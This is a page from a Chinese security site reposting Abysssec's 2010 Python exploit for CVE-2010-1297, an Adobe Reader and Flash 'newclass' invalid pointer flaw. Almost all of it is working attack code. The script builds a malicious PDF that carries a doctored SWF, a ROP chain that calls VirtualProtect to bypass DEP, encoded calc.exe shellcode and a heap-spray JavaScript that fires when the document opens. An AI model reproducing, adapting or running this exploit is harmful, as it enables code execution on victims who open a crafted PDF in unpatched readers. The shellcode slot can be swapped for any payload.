首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Acrobat Reader and Flash Player “newclass” invalid pointer
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-02  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <    Day 1 (Binary Analysis)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/
http://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz

  Title             : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.adobe.com
  Impact            : Ciritical
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-1297
  MOAUB Number      : MOAUB-01-BA
'''

import sys

class PDF:
    
 def __init__(self):
  self.xrefs = []
  self.eol = '\x0a'
  self.content = ''
  self.xrefs_offset = 0
  
 def header(self):
  self.content += '%PDF-1.6' + self.eol
  
 def obj(self, obj_num, data,flag):
  self.xrefs.append(len(self.content))
  self.content += '%d 0 obj' % obj_num
  if flag == 1:
   self.content += self.eol + '<< ' + data + ' >>' + self.eol
  else:
   self.content += self.eol + data + self.eol
  self.content += 'endobj' + self.eol

 def obj_SWFStream(self, obj_num, data, stream):
  self.xrefs.append(len(self.content))
  self.content += '%d 0 obj' % obj_num
  self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))
  self.content += ' >>' + self.eol
  self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
  self.content += 'endobj' + self.eol
 
 def obj_Stream(self, obj_num, data, stream):
  self.xrefs.append(len(self.content))
  self.content += '%d 0 obj' % obj_num
  self.content += self.eol + '<< ' + data + '/Length %d' %len(stream)
  self.content += ' >>' + self.eol
  self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
  self.content += 'endobj' + self.eol
  
 def ref(self, ref_num):
  return '%d 0 R' % ref_num
  
 def xref(self):
  self.xrefs_offset = len(self.content)
  self.content += 'xref' + self.eol
  self.content += '0 %d' % (len(self.xrefs) + 1)
  self.content += self.eol
  self.content += '0000000000 65535 f' + self.eol
  for i in self.xrefs:
   self.content += '%010d 00000 n' % i
   self.content += self.eol
   
 def trailer(self):
  self.content += 'trailer' + self.eol
  self.content += '<< /Size %d' % (len(self.xrefs) + 1)
  self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
  self.content += 'startxref' + self.eol
  self.content += '%d' % self.xrefs_offset
  self.content += self.eol
  self.content += '%%EOF'
  
 def generate(self):
  return self.content


  
  
class Exploit:
    
    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload
            
    def get_payload(self):         
        # shellcode calc.exe
        payload =("\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
           "\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41"
    "\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C"
    "\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C"
    "\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52"
    "\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44"
    "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54"
    "\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45"
    "\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F"
    "\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50"
    "\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C"
    "\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41")
        return payload


    def getSWF(self):
        try:
            #swfFile = sys.argv[2]
            fdR = open('flash.swf', 'rb+')
            strTotal = fdR.read()
            str1 = strTotal[:88]
            addr1 = '\x06\xa6\x17\x30'    #  addr = 0c0c0c0c   
            str2 = strTotal[92:533]
   #***************************   Bypass DEP by VirtualProtect   ********************************
            rop = ''
            rop += "\x77\xFA\x44\x7E"     # mov edi,esp   ret 4
            rop += "\x94\x28\xc2\x77"   #add esp,20  pop ebp  ret
            rop += "AAAA"      #padding
            rop += "\xD4\x1A\x80\x7C"     # VirtualProtect
            rop += "BBBB"         # Ret Addr for VirtualProtect
            rop += "CCCC"         # Param1 (lpAddress)
            rop += "DDDD"         # Param2 (Size)
            rop += "EEEE"         # Param3 (flNewProtect)
            rop += "\x10\xB0\xEF\x77"     # Param4    (Writable Address)
            rop += "AAAAAAAAAAAA"    #padding
            rop += "\xC2\x4D\xC3\x77"   #mov eax,edi   pop esi  ret
            rop += "AAAA"      #padding
            rop += "\xF2\xE1\x12\x06"   #add eax,94   ret
            rop += "\x70\xDC\xEE\x77"     #push esp   pop ebp   ret4
            rop += "\x16\x9A\x94\x7C"   #mov [ebp-30],eax  ret
            rop += "AAAA"      #padding
            rop += "\xC2\x4D\xC3\x77"     #mov eax,edi   pop esi  ret
            rop += "AAAA"      #padding
            rop += "\xF2\xE1\x12\x06"   #add eax,94   ret
            rop += "\x79\x9E\x83\x7C"   #mov [ebp-2c],eax  ret
            rop += "\x27\x56\xEA\x77"   #mov eax,6b3  ret
            rop += "\x14\x83\xE0\x77"   #mov [ebp-28],eax  ret
            rop += "\xB4\x01\xF2\x77"   #xor eax,eax  ret
            rop += "\x88\x41\x97\x7C"   #add eax,40  pop ebp  ret
            rop += "AAAA"      #padding
            rop += "\x70\xDC\xEE\x77"   #push esp   pop ebp   ret4
            rop += "\xC0\x9E\xEF\x77"   #mov [ebp-54],eax  ret
            rop += "AAAA"      #padding
            rop += "\xC2\x4D\xC3\x77"   #mov eax,edi   pop esi  ret
            rop += "AAAA"      #padding
            rop += "\xC1\xF2\xC1\x77"   #add eax,8 ret
            rop += "\xCF\x97\xDE\x77"   #xchg eax,esp   ret
   
            str3 = strTotal[669:1249]
            alignESP = "\x83\xc4\x03"
            sc = self.get_payload()
   
            if len(sc) > 2118:
                print "[*] Error : payload length is long"
                return
            if len(sc) <= 2118:
                dif = 2118 - len(sc)
            while dif > 0 :
                sc += '\x90'
                dif = dif - 1
   
            str4 = strTotal[3370:3726]
   
            addr2 = '\xF2\x3D\x8D\x23'    #  Enter 0C75 , 81    RET 
   
            str5 = strTotal[3730:]
   
            fdW= open('exploit.swf', 'wb+')
            finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5
            fdW.write(finalStr) 
             
            #strTotal = open('exploit.swf', 'rb+').read()
            fdW.close()
            fdR.close()
            return finalStr
           
        except IOError:
            print '[*] Error : An IO error has occurred'
  
    def HeapSpray(self):
        spray = ''' 
        function spray_heap()
        {
            var chunk_size, payload, nopsled;
            
            chunk_size = 0x1A0000;
            pointers = unescape("%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030");
            pointerSled = unescape("<Contents>");
            while (pointerSled.length < chunk_size)
                pointerSled += pointerSled;
            pointerSled_len = chunk_size - (pointers.length + 20);      
            pointerSled = pointerSled.substring(0, pointerSled_len);
            heap_chunks = new Array();
            for (var i = 0 ; i < <CHUNKS> ; i++)
                heap_chunks[i] = pointerSled + pointers;
        }           
       
        
        spray_heap();  
        '''
  
        spray = spray.replace('<Contents>', '%u33dd%u3030')   # Pointer to XCHG ESP , EBX
        '''
Authplay.dll
  
303033DD             ? 87DC                 XCHG ESP,EBX

#############################################################
      will do nothing 

303033DF             ? 45                   INC EBP
303033E0             ? 05 00898784          ADD EAX,84878900
303033E5             ? 42                   INC EDX
303033E6             ? 05 008987E8          ADD EAX,E8878900
303033EB             ? 41                   INC ECX
303033EC             ? 05 008987EC          ADD EAX,EC878900
303033F1             ? 41                   INC ECX
303033F2             ? 05 008987F0          ADD EAX,F0878900
303033F7             ? 41                   INC ECX
303033F8             ? 05 008987F4          ADD EAX,F4878900
303033FD             ? 41                   INC ECX
303033FE             ? 05 005F5E5D          ADD EAX,5D5E5F00
30303403             . B8 01000000          MOV EAX,1
30303408             . 5B                   POP EBX
############################################################

30303409             . 83C4 30              ADD ESP,30
3030340C             . C3                   RETN

        '''

        spray = spray.replace('<CHUNKS>', '40')   #Chunk count
        return spray
  
def generate_pdf():
 exploit = Exploit()
 swfFile = 'exploit.swf'
 pdf = PDF()
 pdf.header()
 pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1)
 #pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)
 pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)
 pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)
 pdf.obj_Stream(4, '','')
 pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)
 pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) 
 pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)
 pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1) 
 pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1) 
 pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1) 
 pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1) 
 pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1) 
 pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)
 pdf.obj_SWFStream(14, ' /Type /EmbeddedFile  ',exploit.getSWF() ) 
 pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)
 pdf.obj_Stream(16, '<</Length 0 >> ','') 
 pdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1)
 
 pdf.xref()
 pdf.trailer()
 return pdf.generate()
 
def main():
 if len(sys.argv) != 2:
  print 'Usage: python %s [output file name]' % sys.argv[0]
  sys.exit(0)
 file_name = sys.argv[1]
 if not file_name.endswith('.pdf'):
  file_name = file_name + '.pdf'
 try:
  fd = open(file_name, 'wb+')
  fd.write(generate_pdf())
  fd.close()
  print '[-] PDF file generated and written to %s' % file_name
 except IOError:
  print '[*] Error : An IO error has occurred'
  print '[-] Exiting ...'
  sys.exit(-1)
if __name__ == '__main__':
 main()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Leadtools ActiveX Common Dialo
·TFTPDWIN v0.4.2 Directory Trav
·mBlogger v1.0.04 (viewpost.php
·TFTP Desktop 2.5 Directory Tra
·MPLAB IDE .mcp .mcw DLL Hijack
·Autodesk MapGuide Viewer Activ
·Spybot-S&D blindman.exe DLL Hi
·Cpanel PHP Restriction Bypass
·SnackAmp 3.1.2 Malicious SMP B
·QtWeb DLL hijacking (wintab32.
·Apple QuickTime 7.6.7 _Marshal
·Nimbuzz social messenger DLL h
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved